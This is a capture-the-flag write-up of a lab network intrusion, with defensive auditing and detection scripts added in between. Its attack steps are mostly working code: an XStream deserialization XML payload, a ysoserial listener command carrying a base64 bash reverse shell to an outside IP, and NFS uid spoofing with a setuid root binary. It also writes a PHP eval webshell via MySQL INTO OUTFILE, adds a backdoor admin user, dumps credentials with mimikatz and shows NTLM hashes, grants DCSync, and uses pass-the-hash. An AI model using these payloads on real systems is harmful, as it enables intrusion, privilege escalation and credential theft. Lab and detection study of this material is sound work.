Start by throwing fscan at the target.
It shows an FTP service that allows anonymous login.
Logging in reveals a pom.xml file with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
According to what people say online, there's an XStream vulnerability here (I don't know Java).
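The POM recovered over anonymous FTP is worth reading as a defender before anything else: it pins xstream 1.4.16 (a release before the XStream security fixes of the 1.4.17/1.4.18 era) and commons-collections 3.2.1 (the gadget library the CommonsCollections6 chain used below relies on; 3.2.2 is the release that hardened deserialization of the transformer classes). The following is an added example, not code from the writeup, that inventories the dependencies declared in a pom.xml and compares them against a policy floor; POLICY_FLOOR holds assumed placeholder minimums, not vendor data, and the embedded POM is a trimmed copy of the one shown above.

```python
"""Inventory the dependencies declared in a Maven pom.xml and flag versions that
fall below a policy floor. Added illustration, not code from the writeup;
POLICY_FLOOR holds assumed placeholder minimums, not vendor data."""
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}

# Assumed policy floor per artifact (placeholder values; take real minimums from
# the vendor advisories for the libraries you actually ship).
POLICY_FLOOR = {
    "com.thoughtworks.xstream:xstream": "1.4.18",
    "commons-collections:commons-collections": "3.2.2",
}

# Trimmed copy of the pom.xml recovered from the FTP server in the writeup above.
POM_FROM_PAGE = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <parent>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId>
    <version>2.7.2</version>
  </parent>
  <dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
      <groupId>com.thoughtworks.xstream</groupId>
      <artifactId>xstream</artifactId>
      <version>1.4.16</version>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.2.1</version>
    </dependency>
  </dependencies>
</project>
"""


def version_key(version):
    """Comparable key: numeric parts as a tuple, and a qualifier such as
    '-SNAPSHOT' sorts below the bare release (Maven's own ordering)."""
    parts = re.split(r"[.\-]", version)
    nums = tuple(int(p) for p in parts if p.isdigit())
    qualified = any(not p.isdigit() for p in parts)
    return (nums, 0 if qualified else 1)


def parse_dependencies(pom_text):
    """One dict per <dependency>; version is None when the parent BOM manages it."""
    root = ET.fromstring(pom_text)
    deps = []
    for dep in root.findall("m:dependencies/m:dependency", NS):
        group = dep.findtext("m:groupId", namespaces=NS)
        artifact = dep.findtext("m:artifactId", namespaces=NS)
        deps.append({
            "coord": f"{group}:{artifact}",
            "version": dep.findtext("m:version", namespaces=NS),
            "scope": dep.findtext("m:scope", default="compile", namespaces=NS),
        })
    return deps


def audit(pom_text, floor=POLICY_FLOOR):
    """Return (coordinate, declared version, floor, reason) for every dependency
    below the floor, or whose version cannot be judged from this POM alone."""
    findings = []
    for dep in parse_dependencies(pom_text):
        minimum = floor.get(dep["coord"])
        if minimum is None:
            continue
        if dep["version"] is None:
            findings.append((dep["coord"], None, minimum,
                             "version inherited from parent; resolve the effective POM first"))
        elif version_key(dep["version"]) < version_key(minimum):
            findings.append((dep["coord"], dep["version"], minimum, "below policy floor"))
    return findings


if __name__ == "__main__":
    for coord, declared, minimum, reason in audit(POM_FROM_PAGE):
        print(f"{coord} {declared} (floor {minimum}): {reason}")
```

Upgrading is the first fix, but XStream's own hardening also applies regardless of version: register an explicit allowlist with `xstream.allowTypes(...)` so that unexpected classes in incoming XML (such as the PriorityQueue and JNDI types in the payload below) are rejected at unmarshal time rather than instantiated. The anonymous FTP share that leaked this POM is a finding of its own.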
Start a listener on a VPS with ysoserial (it seemed to be the same tool used when attacking JDBC):
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuNTcuMjMuNDAvMTExMSAwPiYx}|{base64,-d}|{bash,-i}"
Then listen on port 1111 and send the payload to get a reverse shell. The request sent to the server:
POST /just_sumbit_it HTTP/1.1
Host: 39.101.139.231:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/xml
Content-Length: 3113

<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>123.57.23.40</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>123.57.23.40</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Got a shell, and it's root.
That gives the first flag.
flag:flag{24cee65c-a610-4011-9a1b-188243e52189}
Set up a pivot proxy and upload fscan to scan the internal network.
Finally figured this out: fscan needs root to send ICMP packets, which is why the scan is only fast as root...
./fscan -h 172.22.13.14/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:88 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.28:139 open
172.22.13.6:139 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp 172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] NetInfo
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] NetInfo
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC
[*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] mysql 172.22.13.28:3306:root 123456
已完成 16/16
[*] 扫描结束,耗时: 17.592431045s
There are four machines in total:
172.22.13.6  : WIN-DC
172.22.13.14 : the current (entry) host
172.22.13.28 : WIN-HAUWOLAO
172.22.13.57
The hint mentions an NFS server as well, so scan port 2049.
That makes it clear: 172.22.13.57 is basically the NFS server.
List the exports that are available anonymously:
proxychains showmount -e 172.22.13.57
Trying to mount it from Kali kept failing (Kali is not on the internal network, so of course it can't). The target has no nfs-common and there's no way to apt install it directly.
Install nfs-common on the entry host by running the following:
wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
dpkg -i libtirpc-common_1.2.5-1_all.deb && \
dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
dpkg -i rpcbind_1.2.5-8_amd64.deb && \
dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb
Mount it:
mount -t nfs 172.22.13.57:/home/joyce /mnt
df -h
The mount succeeds.
Check the uid and gid of the owner of the mounted directory.
Create a local user with the same uid and gid, and that forged identity can be used to log in remotely.
First create a group with gid 994, then add the user:
groupadd -g 994 joycegroup
useradd -u 996 -g 994 joyce
Write an SSH public key into the share for remote login.
First switch to the joyce user, then upgrade the shell:
su joyce
python3 -c 'import pty;pty.spawn("/bin/bash")'
Then go to /tmp (one of the few writable directories).
Generate a key pair:
ssh-keygen
Then append the public key to /mnt/.ssh/authorized_keys:
cat id_rsa.pub >> /mnt/.ssh/authorized_keys
Connect:
ssh -i id_rsa joyce@172.22.13.57
Logged in, but no permission to read the flag. Look for SUID binaries to escalate with:
find / -user root -perm -4000 -print 2>/dev/null
The ftp binary looks promising, but after running it and entering !/bin/bash
you still get an ordinary shell rather than a root shell.
Check the exports configuration:
cat /etc/exports
It's configured with no_root_squash. A normal NFS export squashes a remote root account down to the least-privileged uid; with no_root_squash enabled, root is not squashed.
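Both NFS tricks in this section come from the export configuration: the uid/gid match (creating a local joyce with uid 996 and gid 994) works because the default AUTH_SYS flavour simply trusts the uid the client asserts, and the setuid root shell works because no_root_squash stops the server from mapping uid 0 to the anonymous user. The following is an added example, not from the writeup, that audits an /etc/exports file for those settings; SAMPLE_EXPORTS is constructed and only loosely modelled on the lab (the real file is not shown above). It also catches the classic "host (options)" typo, where the whitespace turns the options into a separate entry that exports(5) applies to every host.

```python
"""Audit /etc/exports for the settings behind the NFS escalation described above.
Added illustration, not from the writeup; SAMPLE_EXPORTS is constructed."""
import re

SAMPLE_EXPORTS = """\
# constructed sample, not the lab's real /etc/exports
/home/joyce 172.22.13.0/24(rw,sync,no_root_squash)
/srv/share  *(ro,sync)
/srv/backup 10.1.2.0/24 (rw)
/srv/secure 10.1.2.5(rw,sync,root_squash,sec=krb5p)
"""

TOKEN = re.compile(r"^([^(]*)(?:\((.*)\))?$")      # "client(opt,opt)" or bare "client" or "(opts)"
WORLD = {"*", "0.0.0.0/0", "::/0"}


def parse_exports(text):
    """Return (path, client, options, detached) per client entry. 'detached' marks
    options that were separated from their host by whitespace, which exports(5)
    treats as an entry for all hosts."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *tokens = line.split()
        for tok in tokens:
            client, opts = TOKEN.match(tok).groups()
            options = set(opts.split(",")) if opts else set()
            if client == "":
                entries.append((path, "*", options, True))
            else:
                entries.append((path, client, options, False))
    return entries


def audit_exports(text):
    """Return (severity, 'path -> client', reason) for each risky setting."""
    findings = []
    for path, client, options, detached in parse_exports(text):
        where = f"{path} -> {client}"
        if detached:
            findings.append(("HIGH", where, "options separated from the host by whitespace; they apply to all hosts"))
        if "no_root_squash" in options:
            findings.append(("HIGH", where, "no_root_squash: a remote root keeps uid 0 and can plant setuid binaries"))
        if client in WORLD:
            mode = "rw" if "rw" in options else "ro"
            findings.append(("HIGH" if mode == "rw" else "MEDIUM", where, f"exported {mode} to every host"))
        # sec= defaults to sys (AUTH_SYS): uid/gid are whatever the client claims
        sec = next((o.split("=", 1)[1] for o in options if o.startswith("sec=")), "sys")
        if sec == "sys" and "all_squash" not in options:
            findings.append(("INFO", where, "AUTH_SYS trusts client-supplied uid/gid; any allowed host can impersonate a user by matching ids"))
    return findings


if __name__ == "__main__":
    for severity, where, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"{severity:6} {where}: {reason}")
```

The fixes follow from the findings: keep root_squash (the default), use all_squash where per-user identity is not needed, restrict the client list to specific hosts, and move to sec=krb5, krb5i or krb5p so that identity comes from Kerberos rather than from a uid the client chose.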
Go back to the root account on the entry host and build a root shell:
cat > root.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void) { setgid(0); setuid(0); system("/bin/bash"); return 0; }
EOF
gcc root.c -o root
chmod +s root
Then go back to joyce and run it to escalate.
That gives the flag: flag{03122425-c1a2-4813-894e-5f2e669779f7}
172.22.13.28 has a weak MySQL password; connect to it straight through the proxy with Navicat.
Check secure_file_priv:
show variables like "secure_file_priv";
It's empty, so files can be written. Check the global variables:
show variables like "%general%";
It's a phpstudy install, so go straight to writing a webshell:
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
Connect with AntSword. phpstudy runs with high privileges, so you land as SYSTEM right away.
flag:flag{32e6dcd0-0ed6-4ba5-a52f-410e10f5358c}
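Three settings made that step possible: a guessable root password reachable over the network, secure_file_priv left empty (so SELECT ... INTO OUTFILE can write anywhere the server process can), and mysqld running as SYSTEM under phpstudy, which is why the dropped file is both writable and executed with full privileges. The general log the author queried for the install path is also where such a write shows up if logging is on. The following is an added example, not from the writeup: it classifies the secure_file_priv value and scans general_log lines for file-write queries that drop executable content into a web root. LOG_LINES are constructed in the general_log file format and reuse only the query shown above.

```python
"""Classify secure_file_priv and scan MySQL general_log lines for file writes
that land executable content in a web root. Added illustration, not from the
writeup; LOG_LINES are constructed."""
import re

WEB_EXECUTABLE = {".php", ".phtml", ".jsp", ".jspx", ".asp", ".aspx"}
FILE_IO = re.compile(
    r"\b(INTO\s+(?:OUTFILE|DUMPFILE))\s+(['\"])(.+?)\2"     # file write, path in group 3
    r"|\bLOAD_FILE\s*\(\s*(['\"])(.+?)\4",                 # file read, path in group 5
    re.I)
PAYLOAD = re.compile(r"<\?php|<%|\beval\s*\(|\bsystem\s*\(|base64_decode\s*\(", re.I)
# general_log file format: "<time>\t<thread id> <command>\t<argument>"
ENTRY = re.compile(r"^(\S+)\t\s*(\d+) (\w+)\t(.*)$")

# Constructed log lines; only the webshell query is the one from the writeup.
LOG_LINES = """\
2024-08-20T02:11:05.123456Z\t   12 Connect\troot@172.22.13.14 on  using TCP/IP
2024-08-20T02:11:06.000001Z\t   12 Query\tshow variables like "secure_file_priv"
2024-08-20T02:11:09.443210Z\t   12 Query\tselect "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php"
2024-08-20T02:12:00.000000Z\t   13 Query\tSELECT * INTO OUTFILE '/var/lib/mysql-files/export.csv' FROM orders
2024-08-20T02:12:30.000000Z\t   13 Query\tSELECT LOAD_FILE('/etc/passwd')
"""


def classify_secure_file_priv(value):
    """'' -> unrestricted (the server may read/write any path it can reach),
    NULL -> import/export disabled, anything else -> confined to that directory."""
    if value is None or value.upper() == "NULL":
        return "disabled"
    if value == "":
        return "unrestricted"
    return "restricted"


def scan_general_log(text):
    """Return (severity, time, thread, kind, path) for every file read or write."""
    findings = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m or m.group(3) != "Query":
            continue
        ts, thread, _, query = m.groups()
        for hit in FILE_IO.finditer(query):
            if hit.group(1):                       # INTO OUTFILE / INTO DUMPFILE
                path = hit.group(3)
                ext = "." + path.rsplit(".", 1)[-1].lower() if "." in path else ""
                # executable extension or script markers in the written content => webshell drop
                severity = "CRITICAL" if ext in WEB_EXECUTABLE or PAYLOAD.search(query) else "MEDIUM"
                findings.append((severity, ts, thread, "file write", path))
            else:                                  # LOAD_FILE(...)
                findings.append(("MEDIUM", ts, thread, "file read", hit.group(5)))
    return findings


if __name__ == "__main__":
    print("secure_file_priv='' is", classify_secure_file_priv(""))
    for finding in scan_general_log(LOG_LINES):
        print(*finding)
```

The corrective settings are the mirror image of the findings: secure_file_priv=NULL (or a dedicated export directory outside any web root), a service account for mysqld instead of SYSTEM, no root login from the network, and a password that a scanner's default list does not contain.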
Add a user and RDP in:
net user lbz lbz12345! /add
net localgroup administrators lbz /add
Upload BloodHound and run it (it only worked with SYSTEM privileges, not sure why).
The CHENLEI user turns out to be really powerful: it is a member of the ACL ADMIN group and has GenericWrite and WriteDacl on the DC, which means it can grant itself DCSync.
Upload mimikatz to collect domain information:
sekurlsa::logonpasswords
That yields chenglei's password Xt61f3LBhg1,
the NTLM hash 0c00801c30594a1b8eaa889d237c5382,
and the SYSTEM NTLM hash b0987f611bd26671ccec2482bc23cd5a.
Use dacledit.py to grant chenglei DCSync rights:
proxychains python3 dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6
Use secretsdump to dump the hashes:
proxychains python3 secretsdump.py xiaorang.lab/chenglei@172.22.13.6 -hashes :0c00801c30594a1b8eaa889d237c5382 -just-dc-ntlm
That yields the Administrator NTLM hash: 6341235defdaed66fb7b682665752c9a
Pass the hash to log in:
proxychains python3 psexec.py -hashes :6341235defdaed66fb7b682665752c9a XIAORANG/Administrator@172.22.13.6
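The dacledit.py and secretsdump.py steps leave two distinct traces on the DC when directory service auditing is on: Event ID 5136 for the change to the domain object's nTSecurityDescriptor (the DCSync grant), then Event ID 4662 where the Properties field carries the DS-Replication-Get-Changes extended-right GUIDs (the replication request itself). Only domain controllers and a few sanctioned replication identities should ever trigger the second one. The following is an added example, not from the writeup, that flags replication requests from principals outside an allowlist and correlates them with a preceding DACL edit by the same account; the events are constructed, reusing only the principal and domain names that appear above, and EXPECTED_REPLICATORS is an assumed allowlist for this lab.

```python
"""Detect the grant-then-dump DCSync pattern from Security log events.
Added illustration, not from the writeup; EVENTS are constructed."""
import re
from datetime import datetime, timedelta

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"   # schema GUID of the domain object class
GUID = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Assumed allowlist for the lab: the DC's machine account. Real estates list every
# DC plus sanctioned replication identities (directory sync connectors, backup agents).
EXPECTED_REPLICATORS = {"WIN-DC$"}

# Constructed events; field names follow the Security log, values are made up apart
# from the principal and domain names taken from the writeup.
EVENTS = [
    {"EventID": 5136, "Time": "2024-08-20T03:10:02", "Subject": "XIAORANG\\chenglei",
     "ObjectDN": "DC=xiaorang,DC=lab", "Attribute": "nTSecurityDescriptor", "Operation": "Value Added"},
    {"EventID": 4662, "Time": "2024-08-20T03:10:41", "Subject": "XIAORANG\\chenglei",
     "ObjectType": f"%{{{DOMAIN_DNS_CLASS}}}", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Time": "2024-08-20T03:15:00", "Subject": "XIAORANG\\WIN-DC$",
     "ObjectType": f"%{{{DOMAIN_DNS_CLASS}}}", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},          # normal DC-to-DC replication
    {"EventID": 4662, "Time": "2024-08-20T03:16:00", "Subject": "XIAORANG\\joyce",
     "ObjectType": f"%{{{DOMAIN_DNS_CLASS}}}", "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},          # placeholder, not a replication right
]


def replication_requests(events, allowlist=EXPECTED_REPLICATORS):
    """(time, subject, [right names]) for 4662 events that exercise a replication
    extended right from a principal outside the allowlist."""
    hits = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID.findall(e["Properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        account = e["Subject"].split("\\")[-1]
        if rights and account not in allowlist:
            hits.append((e["Time"], e["Subject"], rights))
    return hits


def domain_dacl_changes(events):
    """(time, subject) for 5136 events that rewrote the security descriptor of the domain head."""
    return [(e["Time"], e["Subject"]) for e in events
            if e["EventID"] == 5136 and e["Attribute"] == "nTSecurityDescriptor"
            and e["ObjectDN"].upper().startswith("DC=")]


def correlate(events, window=timedelta(hours=1)):
    """Pair each suspicious replication request with a DACL edit on the domain head
    by the same subject inside the window: the grant-then-dump sequence above."""
    alerts = []
    dacl = domain_dacl_changes(events)
    for t_req, subject, rights in replication_requests(events):
        for t_mod, who in dacl:
            delta = datetime.fromisoformat(t_req) - datetime.fromisoformat(t_mod)
            if who == subject and timedelta(0) <= delta <= window:
                alerts.append({"subject": subject, "dacl_change": t_mod,
                               "replication": t_req, "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

The prerequisite the author found with BloodHound (a non-tier-0 group holding WriteDacl and GenericWrite on the domain object) is the thing to remove; the detection above is the safety net for when such a grant is abused before it is cleaned up.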
That gives the fourth flag.
flag:flag{27f119fa-b5f3-440c-affb-f1fe5272706f}
Total time: 3 hours 50 minutes, most of it stuck on the second flag, where the public key just would not write. It only made sense after seeing the step of adding the joyce user. Writing an ACL to add DCSync rights is no longer unfamiliar; I did the same thing in the Exchange lab. The odd part is that SharpHound needed SYSTEM privileges to collect; I remembered ordinary domain users being able to run it.